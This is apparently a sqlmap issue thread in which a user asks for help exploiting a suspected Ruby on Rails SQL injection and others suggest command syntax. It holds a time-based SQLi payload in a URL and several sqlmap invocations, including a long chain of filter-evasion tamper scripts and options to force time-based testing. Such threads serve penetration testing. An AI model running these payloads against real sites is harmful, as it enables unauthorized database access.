Not a bug. Need help to find the right syntax

[brandonalmost]

Hello,

First sorry to open a issue about this again i know it's not a issue with sqlmap but i am lost with ruby on rails sql injection. I really need help to find the right syntax.

Ruby on Rails SQL injection

https://localhost/index.htm?cat=1&ob[mysql%20where%20sleep(1/10)%20%3b%20--%20.user][1]=1&off=1

So i tried your syntax from this issue

sqlmap.py -u "https://localhost/index.htm?cat=1&ob[mysql%20where%20sleep(1/10)%20%3b%20--%20.user][1]=1&off=1" --eval='import time;uri=uri.replace("user]", "user%d]" % time.time())' --level=3 --risk=3 --time-sec=1

I got a error:

[CRITICAL] an error occurred while evaluating provided code ('invalid syntax')

I also tried to inject the parameter directly with this command:

sqlmap.py -u "https://localhost/index.htm?cat=1&ob=1*&off=1" --risk=3 --level=3 --time-sec=1

False, normal blind unstead of time based: Appears to be 'OR boolean-based blind - WHERE or HAVING clause (NOT)' injectable [WARNING] false positive or unexploitable injection point detected

[iwantaturboman]

Don't you think it's a false positive ?

[putuoka]

try this

sqlmap.py -u "https://localhost/index.htm?cat=1&ob=1&off=1" --random-agent --batch --risk=3 --level=3 -p ob --tamper=apostrophemask,apostrophenullencode,base64encode,between,chardoubleencode,charencode,charunicodeencode,equaltolike,greatest,ifnull2ifisnull,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,space2comment,space2plus,space2randomblank,unionalltounion,unmagicquotes

[syedafzal]

use --technique=T to force timebased injection.

[stamparm]

@brandonalmost sorry for ignoring this. Is there are CVE related to this SQLi? I mean, from your payload it doesn't look like a proper SQL injection (no delimiter after [mysql)

[AmericanY]

@brandonalmost rerun your command to confirm it's a valid SQLI, also kindly proceed with --drop-set-cookie since it's a Boolean.